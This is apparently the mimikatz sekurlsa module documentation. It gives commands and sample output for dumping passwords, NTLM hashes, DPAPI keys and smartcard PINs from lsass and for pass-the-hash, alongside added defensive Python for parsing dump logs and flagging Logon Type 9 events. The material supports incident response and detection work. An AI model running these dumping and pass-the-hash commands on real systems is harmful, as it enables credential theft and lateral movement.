# module ~ sekurlsa

This module extracts passwords, keys, PIN codes and tickets from the memory of `lsass` (Local Security Authority Subsystem Service): the live process by default, or a minidump of it (see: howto ~ get passwords by memory dump for minidump or other dump instructions).
When working with the `lsass` process, `mimikatz` needs some rights; choose one:

- Administrator, to get the `debug` privilege via `privilege::debug`
- `SYSTEM` account, via post-exploitation tools, scheduled tasks, `psexec -s` ... in this case the `debug` privilege is not needed.
Without rights to access the `lsass` process, all commands will fail with an error like this: `ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)` (except when working with a minidump).

So, do not hesitate to start with:

```
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # log sekurlsa.log
Using 'sekurlsa.log' for logfile : OK
```

...before other commands 😉
The information that can be extracted depends on the version of Windows and the authentication methods in use: [en] http://1drv.ms/1fCWkhu

Commands: `logonpasswords`, `pth`, `tickets`, `dpapi`, `minidump`, `process`, `searchpasswords`, `msv`, `wdigest`, `kerberos`, `tspkg`, `livessp`, `ssp`, `credman`
```
mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 88038 (00000000:000157e6)
Session           : Interactive from 1
User Name         : Gentil Kiwi
Domain            : vm-w7-ult
SID               : S-1-5-21-2044528444-627255920-3055224092-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * Password : waza1234/
        wdigest :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * Password : waza1234/
        kerberos :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * Password : waza1234/
        ssp :
         [00000000]
         * Username : admin
         * Domain   : nas
         * Password : anotherpassword
        credman :
         [00000000]
         * Username : nas\admin
         * Domain   : nas.chocolate.local
         * Password : anotherpassword
```
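During incident response, a `sekurlsa.log` recovered from a compromised host is the fastest way to scope which accounts need a credential reset: every logon session listed, every provider that held a clear-text secret, and, importantly, the extra accounts that providers such as `ssp` and `credman` expose beyond the session owner. The following parser is an added example and is not part of mimikatz or this page; it reads the output layout shown above (also the `CredentialKeys` and `PIN code` excerpts later on this page) and the sample log embedded in it is assembled from those excerpts, using the page's own example values.

```python
import re
from collections import defaultdict

# Constructed sample: the page's own output excerpts re-assembled into one log,
# with the indentation mimikatz prints. Values are the page's example values.
SAMPLE_LOG = r"""
Authentication Id : 0 ; 88038 (00000000:000157e6)
Session           : Interactive from 1
User Name         : Gentil Kiwi
Domain            : vm-w7-ult
SID               : S-1-5-21-2044528444-627255920-3055224092-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * NTLM     : cc36cf7a8514893efccd332446158b1a
        wdigest :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * Password : waza1234/
        credman :
         [00000000]
         * Username : nas\admin
         * Domain   : nas.chocolate.local
         * Password : anotherpassword

Authentication Id : 0 ; 3518063 (00000000:0035ae6f)
Session           : Unlock from 1
User Name         : Administrateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-500
        kerberos :
         * Username : Administrateur
         * Domain   : CHOCOLATE.LOCAL
         * Password : (null)
         * PIN code : 1234

Authentication Id : 0 ; 3463053 (00000000:0034d78d)
Session           : Interactive from 2
User Name         : utilisateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-1107
        msv :
         [00010000] CredentialKeys
         * NTLM     : 8e3a18d453ec2450c321003772d678d5
         * SHA1     : 90bbad2741ee9c533eb8eb37f8fb4172b8896ffa
         [00000003] Primary
         * Username : utilisateur
         * Domain   : CHOCOLATE
         * NTLM     : 8e3a18d453ec2450c321003772d678d5
"""

SESSION_RE = re.compile(r"^Authentication Id\s*:\s*(.+)$")
HEADER_RE = re.compile(r"^(Session|User Name|Domain|SID)\s*:\s*(.*)$")
PROVIDER_RE = re.compile(r"^\s*(\w+)\s*:\s*$")                # "msv :"
ENTRY_RE = re.compile(r"^\s*\[([0-9a-fA-F]+)\]\s*(.*)$")       # "[00000003] Primary"
FIELD_RE = re.compile(r"^\s*\*\s*([\w ]+?)\s*:\s*(.*)$")       # "* NTLM : ..."

def parse_sekurlsa(text):
    """Split sekurlsa output into sessions -> providers -> entries -> fields."""
    sessions, cur, provider = [], None, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if m := SESSION_RE.match(line):
            cur = {"auth_id": m.group(1).strip(), "providers": defaultdict(list)}
            sessions.append(cur)
            provider = None
        elif cur is None:
            continue                                  # banner/prompt before first session
        elif provider is None and (m := HEADER_RE.match(line)):
            cur[m.group(1).lower().replace(" ", "_")] = m.group(2).strip()
        elif m := PROVIDER_RE.match(line):
            provider = m.group(1).lower()
            cur["providers"][provider].append({})     # placeholder for an unnamed entry
        elif provider and (m := ENTRY_RE.match(line)):
            entries = cur["providers"][provider]
            if entries[-1]:                           # placeholder already holds fields
                entries.append({})
            entries[-1]["_entry"] = m.group(2) or m.group(1)
        elif provider and (m := FIELD_RE.match(line)):
            cur["providers"][provider][-1][m.group(1).lower()] = m.group(2).strip()
    return sessions

def exposure_report(sessions):
    """Per session: providers holding a clear-text secret (password or PIN), providers
    holding an NTLM hash, and accounts other than the session owner that were exposed."""
    report = []
    for s in sessions:
        owner = s.get("user_name", "").lower()
        clear, ntlm, others = set(), set(), set()
        for name, entries in s["providers"].items():
            for e in entries:
                secret = any(e.get(k, "(null)") != "(null)" for k in ("password", "pin code"))
                if secret:
                    clear.add(name)
                if "ntlm" in e:
                    ntlm.add(name)
                user = e.get("username", "").lower()  # compare usernames only: the domain
                if (secret or "ntlm" in e) and user and user != owner:  # may be NetBIOS or DNS
                    others.add((e.get("domain", "").lower(), user))
        report.append({"user": f"{s.get('domain')}\\{s.get('user_name')}",
                       "cleartext_from": sorted(clear), "ntlm_from": sorted(ntlm),
                       "other_accounts": sorted(others)})
    return report
```

Run `exposure_report(parse_sekurlsa(open("sekurlsa.log").read()))` over a recovered log; every account in `user` and `other_accounts` belongs on the reset list, and the `cleartext_from` column tells you which providers (here `wdigest`, `credman`, the smartcard PIN in `kerberos`) were holding reversible secrets on that host.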
## Pass-The-Hash

`mimikatz` can perform the well-known 'Pass-The-Hash' operation to run a process under other credentials using the NTLM hash of the user's password, instead of the real password.

For this, it starts a process with a fake identity, then replaces the fake information (NTLM hash of the fake password) with the real information (NTLM hash of the real password).
Arguments:

- `/user` - the username you want to impersonate; keep in mind that Administrator is not the only name for this well-known account.
- `/domain` - the domain name; without a domain, or in the case of a local user/admin, use the computer or server name, `workgroup`, or whatever.
- `/ntlm` - the NTLM hash of the user's password
- `/run` - optional - the command line to run; the default is `cmd`, to have a shell.
```
mimikatz # sekurlsa::pth /user:utilisateur /domain:chocolate /ntlm:8e3a18d453ec2450c321003772d678d5 /run:"cmd /k dir \\win81.chocolate.local\test\flag.txt"
user    : utilisateur
domain  : chocolate
NTLM    : 8e3a18d453ec2450c321003772d678d5
Program : cmd /k dir \\win81.chocolate.local\test\flag.txt
  |  PID  1828
  |  TID  856
  |  LUID 0 ; 3201168 (00000000:0030d890)
  \_ Data copy @ 00000000004A6300 : OK !
```
Remarks:

- This command does not work with minidumps (nonsense);
- it requires elevated privileges (`privilege::debug` or `SYSTEM` account), unlike 'Pass-The-Ticket', which uses an official API.

See also:

- Pass-The-Ticket: `kerberos::ptt`
- Golden Ticket: `kerberos::golden`
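The "starts a process with a fake identity" step above is a network-only (NewCredentials) logon on the source host, which the Security log records as event 4624 with Logon Type 9, logon process `seclogo` and authentication package `Negotiate`; the credentials are not validated at that point, which is why the fake password is accepted. `runas /netonly` produces the same record, so this is a triage signal rather than proof. The following filter is an added example and is not part of mimikatz or this page; the event records are constructed, with made-up user names, and only carry the 4624 fields a SIEM would normally keep.

```python
from collections import defaultdict

# Constructed sample of Security 4624 events reduced to the relevant fields.
# User names are placeholders; only the Logon Type/process/package values are real.
SAMPLE_4624 = [
    {"SubjectUserName": "alice", "TargetUserName": "alice", "TargetDomainName": "CORP",
     "LogonType": 2, "LogonProcessName": "User32", "AuthenticationPackageName": "Negotiate"},
    # NewCredentials logons via the secondary logon path: this is what
    # sekurlsa::pth (and runas /netonly) leave on the host they run on
    {"SubjectUserName": "alice", "TargetUserName": "utilisateur", "TargetDomainName": "chocolate",
     "LogonType": 9, "LogonProcessName": "seclogo", "AuthenticationPackageName": "Negotiate"},
    {"SubjectUserName": "alice", "TargetUserName": "Administrateur", "TargetDomainName": "chocolate",
     "LogonType": 9, "LogonProcessName": "seclogo", "AuthenticationPackageName": "Negotiate"},
    {"SubjectUserName": "-", "TargetUserName": "bob", "TargetDomainName": "CORP",
     "LogonType": 3, "LogonProcessName": "NtLmSsp", "AuthenticationPackageName": "NTLM"},
]

def is_newcredentials_logon(ev):
    """True for a 4624 shaped like a NewCredentials logon through seclogo/Negotiate."""
    return (ev.get("LogonType") == 9
            and ev.get("LogonProcessName", "").lower() == "seclogo"
            and ev.get("AuthenticationPackageName", "").lower() == "negotiate")

def triage_newcredentials(events, threshold=2):
    """Group NewCredentials logons by the subject that created them and return the
    subjects that took on at least `threshold` distinct identities. One such logon
    is routine admin work; one account cycling through several is worth a look."""
    by_subject = defaultdict(set)
    for ev in events:
        if is_newcredentials_logon(ev):
            by_subject[ev["SubjectUserName"]].add(
                f"{ev['TargetDomainName']}\\{ev['TargetUserName']}")
    return {subj: sorted(targets) for subj, targets in by_subject.items()
            if len(targets) >= threshold}
```

Type 9 logons are rare on most workstations, so a baseline of which subjects legitimately use `runas /netonly` keeps the `threshold` small; pair the hit with the process that created the logon and with any handle opened on `lsass`, since that is what `sekurlsa::pth` needs and `runas` does not.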
```
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 88038 (00000000:000157e6)
Session           : Interactive from 1
User Name         : Gentil Kiwi
Domain            : vm-w7-ult
SID               : S-1-5-21-2044528444-627255920-3055224092-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
...
```
Remark:

| Dump from  | Works on                      |
|------------|-------------------------------|
| NT 5 - x86 | NT 5 - x86                    |
| NT 5 - x64 | NT 5 - x64                    |
| NT 6 - x86 | NT 6 - x86/x64 (mimikatz x86) |
| NT 6 - x64 | NT 6 - x64                    |
Some errors:

- `ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->MajorVersion (A) != MIMIKATZ_NT_MAJOR_VERSION (B)`: you are trying to open a minidump from a Windows NT of another major version (NT5 vs NT6).
- `ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->ProcessorArchitecture (A) != PROCESSOR_ARCHITECTURE_xxx (B)`: you are trying to open a minidump from a Windows NT of another architecture (x86 vs x64).
- `ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002)`: the minidump file was not found (check the path).
```
Authentication Id : 0 ; 3518063 (00000000:0035ae6f)
Session           : Unlock from 1
User Name         : Administrateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-500
        msv :
         [00010000] CredentialKeys
         * RootKey  : 2a099891174e2d700d44368255a53a1a0e360471343c1ad580d57989bba09a14
         * DPAPI    : 43d7b788389b67ee3bcac1786f01a75f

Authentication Id : 0 ; 3463053 (00000000:0034d78d)
Session           : Interactive from 2
User Name         : utilisateur
Domain            : CHOCOLATE
SID               : S-1-5-21-130452501-2365100805-3685010670-1107
        msv :
         [00010000] CredentialKeys
         * NTLM     : 8e3a18d453ec2450c321003772d678d5
         * SHA1     : 90bbad2741ee9c533eb8eb37f8fb4172b8896ffa
         [00000003] Primary
         * Username : utilisateur
         * Domain   : CHOCOLATE
         * LM       : 00000000000000000000000000000000
         * NTLM     : 8e3a18d453ec2450c321003772d678d5
         * SHA1     : 90bbad2741ee9c533eb8eb37f8fb4172b8896ffa
```
When using smartcard logon on the domain, `lsass` caches the PIN code of the smartcard:

```
mimikatz # sekurlsa::kerberos
[...]
        kerberos :
         * Username : Administrateur
         * Domain   : CHOCOLATE.LOCAL
         * Password : (null)
         * PIN code : 1234
```